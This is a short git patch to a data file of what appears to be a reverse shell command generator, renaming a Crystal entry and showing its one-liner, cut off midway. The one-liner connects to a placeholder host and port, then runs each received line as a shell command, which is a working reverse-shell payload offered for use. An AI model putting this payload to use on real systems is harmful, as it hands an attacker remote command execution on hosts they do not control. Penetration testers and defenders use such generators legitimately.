From 58bcedcbf8a4d0bbe43c870c1552bc39321dce63 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sun, 19 Mar 2023 21:59:27 +0100 Subject: [PATCH] add code vs system --- js/data.js | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 37b6560..40ae653 100644 --- a/js/data.js +++ b/js/data.js @@ -361,10 +361,15 @@ const reverseShellCommands = withCommandType( "meta": ["linux", "mac", "windows"] }, { - "name": "Crystal", + "name": "Crystal (system)", "command": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"{ip}\",{port});loop{m,l=c.receive;p=Process.new(m.rstrip(\"\\n\"),output:Process::Redirect::Pipe,shell:true);c<